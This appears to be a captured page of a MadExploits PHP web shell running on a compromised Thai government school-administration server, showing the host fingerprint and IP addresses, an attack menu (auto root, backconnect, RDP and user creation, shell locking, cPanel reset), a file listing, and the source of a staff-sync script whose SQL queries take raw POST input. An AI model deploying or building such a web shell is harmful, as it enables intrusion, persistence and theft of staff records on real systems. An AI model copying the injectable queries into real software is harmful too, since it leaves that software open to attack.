Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
person /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
manual
[ DIR ]
drwxr-xr-x
picture
[ DIR ]
drwxrwxrwx
signature
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxrwxrwx
birthday_import.php
4.08
KB
-rw-r--r--
change_status_person.php
11.65
KB
-rwxr-xr-x
change_status_person_sch.php
18.67
KB
-rwxr-xr-x
default.php
258
B
-rwxr-xr-x
delegate_sch.php
15.53
KB
-rwxr-xr-x
export_to_excel.php
1.99
KB
-rwxr-xr-x
getxml_person.php
10.53
KB
-rw-r--r--
getxml_person.phpฯศฏ
8.94
KB
-rwxr-xr-x
index.php
337
B
-rwxr-xr-x
lack_person.php
10.24
KB
-rw-r--r--
livesearch.php
616
B
-rwxr-xr-x
livesearch_2.php
608
B
-rwxr-xr-x
livesearch_3.php
622
B
-rwxr-xr-x
livesearch_4.php
630
B
-rwxr-xr-x
livesearch_mobile.php
623
B
-rwxr-xr-x
menu.php
6.16
KB
-rw-r--r--
menu_mobile.php
960
B
-rwxr-xr-x
permission.php
8.55
KB
-rwxr-xr-x
person.php
19.45
KB
-rwxr-xr-x
person1111.php
16.77
KB
-rwxr-xr-x
person_import.php
4.46
KB
-rwxr-xr-x
person_report1.php
5.5
KB
-rwxr-xr-x
person_report1_mobile.php
1.89
KB
-rwxr-xr-x
person_sch.php
29.12
KB
-rwxr-xr-x
person_sch111.php
25.17
KB
-rwxr-xr-x
person_sch2.php
8.2
KB
-rwxr-xr-x
person_sch_import.php
4.55
KB
-rwxr-xr-x
person_sch_other.php
12.11
KB
-rwxr-xr-x
person_sch_report1.php
12.47
KB
-rwxr-xr-x
person_sch_report1_mobile.php
8.76
KB
-rwxr-xr-x
pic_show.php
1.26
KB
-rwxr-xr-x
pic_show.php~
871
B
-rwxr-xr-x
pic_show_2.php
1.13
KB
-rwxr-xr-x
pic_show_2.php~
871
B
-rwxr-xr-x
position.php
6.36
KB
-rwxr-xr-x
return_ajax_schperson.php
710
B
-rwxr-xr-x
sch_position.php
11.23
KB
-rwxr-xr-x
school.php
3.11
KB
-rwxr-xr-x
signature.php
5.94
KB
-rw-r--r--
signature_show.php
1.33
KB
-rw-r--r--
time_inc.php
955
B
-rw-r--r--
update_picture1.php
1.73
KB
-rwxr-xr-x
update_picture2.php
1.74
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : getxml_person.phpฯศฏ
<?php error_reporting(0); defined( '_VALID_' ) or die( 'Direct Access to this location is not allowed.' ); //ส่วนบันทึกข้อมูล if($index==4){ $rec_date = date("Y-m-d"); for($i=0;$i<count($_POST['name']);$i++){ $person_id_number=$_POST['person_id_number'][$i]; $prename=$_POST['prename'][$i]; $name=$_POST['name'][$i]; $surname=$_POST['surname'][$i]; $position_code=$_POST['position_code'][$i]; $school_code=$_POST['school_code'][$i]; $sql = "select id from person_sch_main where person_id='$person_id_number'"; $dbquery = mysqli_query($connect,$sql); $row_num=mysqli_num_rows($dbquery); if($row_num<1){ $sql = "insert into person_sch_main(person_id,prename,name,surname,position_code,school_code,pic,status,person_order,officer,rec_date,other) values ('$person_id_number','$prename','$name','$surname','$position_code','$school_code','','0','0','$_SESSION[login_user_id]','$rec_date','0')"; $dbquery = mysqli_query($connect,$sql); } } echo "<script>document.location.href='?option=person&task=person_sch&school_code=$school_code';</script>\n"; } if(!(isset($_POST['urlGET']))){ echo "<br />"; echo "<form method='post' action='' id='frm1' name='frm1'>"; echo "<table align='center'>"; echo "<tr>"; echo "<td>"; $sql = "select * from system_sync_smss_2 left join system_school on system_sync_smss_2.office_code=system_school.school_code order by system_school.school_type,system_school.school_code"; $dbquery = mysqli_query($connect,$sql); $ROW=1; $COLUMN=1; echo "<fieldset>"; echo "<legend> <B>เลือกสถานศึกษา</B>: </legend>"; echo "<table>"; While ($result = mysqli_fetch_array($dbquery)){ if($ROW==1){ echo "<tr>"; } echo "<td><input type='checkbox' name='chk' onclick='Check()'>$result[school_code] $result[school_name]"; echo "<input type='hidden' name='urlGET[]' value='$result[school_code]' disabled>"; if($COLUMN==4){ echo "</tr>"; $COLUMN=0; $ROW=0; } $ROW++; $COLUMN++; } echo "</table>"; echo "</fieldset>"; echo "</td>"; echo "</tr>"; echo "</table>"; echo "<br />"; echo "<div align='center'><input type='submit'></div>"; echo "</form>"; } if(isset($_POST['urlGET'])){ $urlGET=$_POST['urlGET']; $requester_server_id = $_SERVER["SERVER_ADDR"]; echo "<form id='frm1' name='frm1'>"; foreach ($urlGET as &$value) { $school_code= $value; $sql_sync = "select * from system_sync_smss_2 where office_code='$school_code'"; $dbquery_sync = mysqli_query($connect,$sql_sync); $result_sync = mysqli_fetch_array($dbquery_sync); $smss_url=$result_sync['smss_url']; $sync_code=$result_sync['sync_code']; $url ="$smss_url"."export/xml.php?username=amssplus&password=$sync_code&requester_server_id=$requester_server_id&order=person"; $xmlDoc = new DOMDocument(); $xmlDoc->load($url); $announce = $xmlDoc->getElementsByTagName('item'); $warning=base64_decode($xmlDoc->getElementsByTagName('warning')->item(0)->nodeValue); if($warning!="1"){ echo "<br>"; echo "<div align='center'>"; echo $warning; echo "</div>"; } //ตรวจสอบการเข้าถุึงเว็บsmss $smss_fond="0"; if($warning!=""){ $smss_fond="1"; } if($smss_fond=="0"){ $smss_url = explode("?",$url); echo "<br>"; echo "<div align='center'>"; echo "ไม่สามารถเข้าถึง".$smss_url[0]; echo "</div>"; } if($warning=="1" and $smss_fond=="1"){ echo "<br />"; echo "<table align='center' width='65%' border='0'>"; echo "<tr><td align='center'><b>รายชื่อครูและบุคลากรทางการศึกษา"; $school_code=base64_decode($xmlDoc->getElementsByTagName('office_code')->item(0)->nodeValue); echo base64_decode($xmlDoc->getElementsByTagName('school_name')->item(0)->nodeValue); echo " "; echo $school_code; echo "</b></td></tr>"; echo "</table>"; echo "<table align='center' width='65%' border='1' borderColor='#FF0033' style='border-collapse: collapse'>"; echo "<tr align='center' bgcolor='#FBD562'><td width='50'>ที่</td><td width='140'>เลขประจำตัวประชาชน</td><td width='100'>คำนำหน้า</td><td width='150'>ชื่อ</td><td width='150'>นามสกุล</td><td width='50'>รหัสตำแหน่ง</td><td>ชื่อตำแหน่ง</td></tr>"; $i=1; foreach ($announce as $ann) { if(($i%2) == 0) $color="#FFFFFF"; else $color="#FFFFFF"; $person_id=base64_decode($ann->getElementsByTagName('person_id')->item(0)->nodeValue); $prename=base64_decode($ann->getElementsByTagName('prename')->item(0)->nodeValue); $name=base64_decode($ann->getElementsByTagName('name')->item(0)->nodeValue); $surname=base64_decode($ann->getElementsByTagName('surname')->item(0)->nodeValue); $position_code=base64_decode($ann->getElementsByTagName('position_code')->item(0)->nodeValue); $position_name=base64_decode($ann->getElementsByTagName('position_name')->item(0)->nodeValue); echo "<tr bgcolor=$color align='center'>"; echo "<td align='center'><input type='checkbox' name='chk2[]' onclick='Check2()'>$i</td>"; echo "<td align='center'>"; echo "<Input Type='Text' Name='person_id_number[]' Size='13' value='$person_id' disabled>"; echo "</td>"; echo "<td>"; echo "<Input Type='Text' Name='prename[]' Size='10' value='$prename' disabled>"; echo "</td>"; echo "<td>"; echo "<Input Type='Text' Name='name[]' Size='20' value='$name' disabled>"; echo "</td>"; echo "<td>"; echo "<Input Type='Text' Name='surname[]' Size='20' value='$surname' disabled>"; echo "</td>"; echo "<td>"; echo "<Input Type='Text' Name='position_code[]' Size='5' value='$position_code' disabled>"; echo "</td>"; echo "<td>"; echo $position_name; echo "</td>"; echo "<Input Type='Hidden' Name='school_code[]' Value='$school_code' disabled>"; $i++; echo "</tr>"; } echo "</table>"; echo "<br>"; } } //if not warning echo "<table align='center' width='65%' border='1' borderColor='#FF0033' style='border-collapse: collapse'>"; echo "<tr><td align='left'> <input type='checkbox' name='allchk' id='allchk' onclick='CheckAll()'> เลือกทั้งหมด <font color='#FF0000'>*ตรวจสอบรหัสตำแหน่งให้ถูกต้อง</font></td></tr>"; echo "</table>"; echo "<table align='center' width='70%' border='0'>"; echo "<tr><td align='right'>หมายเหตุ การบันทึกข้อมูลได้ครั้งละเท่าไร ยังขึ้นอยู่กับการกำหนดค่าที่ php.ini</td></tr>"; echo "</table>"; echo "<br>"; echo "<div align='center'><INPUT TYPE='button' name='smb' value='บันทึก' onclick='goto_url(1)'></div>"; echo "</form>"; unset($value); // break the reference with the last element } ?> <script> function Check() { var x = document.getElementsByName("chk"); var y = document.getElementsByName("urlGET[]"); var i; for (i = 0; i < x.length; i++) { if (x[i].type == "checkbox") { if(x[i].checked == true){ y[i].disabled=false; } if(x[i].checked == false){ y[i].disabled=true; } } } } function Check2() { var x = document.getElementsByName("chk2[]"); var y1 = document.getElementsByName("person_id_number[]"); var y2 = document.getElementsByName("prename[]"); var y3 = document.getElementsByName("name[]"); var y4 = document.getElementsByName("surname[]"); var y5 = document.getElementsByName("position_code[]"); var y6 = document.getElementsByName("school_code[]"); var i; for (i = 0; i < x.length; i++) { if (x[i].type == "checkbox") { if(x[i].checked == true){ y1[i].disabled=false; y2[i].disabled=false; y3[i].disabled=false; y4[i].disabled=false; y5[i].disabled=false; y6[i].disabled=false; } if(x[i].checked == false){ y1[i].disabled=true; y2[i].disabled=true; y3[i].disabled=true; y4[i].disabled=true; y5[i].disabled=true; y6[i].disabled=true; } } } } function CheckAll() { var x = document.getElementsByName("chk2[]"); var y1 = document.getElementsByName("person_id_number[]"); var y2 = document.getElementsByName("prename[]"); var y3 = document.getElementsByName("name[]"); var y4 = document.getElementsByName("surname[]"); var y5 = document.getElementsByName("position_code[]"); var y6 = document.getElementsByName("school_code[]"); for (var i = 0; i < document.frm1.elements.length; i++) { if(document.frm1.allchk.checked==true){ x[i].checked=true; y1[i].disabled=false; y2[i].disabled=false; y3[i].disabled=false; y4[i].disabled=false; y5[i].disabled=false; y6[i].disabled=false; } else{ x[i].checked=false; y1[i].disabled=true; y2[i].disabled=true; y3[i].disabled=true; y4[i].disabled=true; y5[i].disabled=true; y6[i].disabled=true; } } } function goto_url(val){ callfrm("?option=person&task=getxml_person&index=4"); //page ประมวลผล } </script>
Close
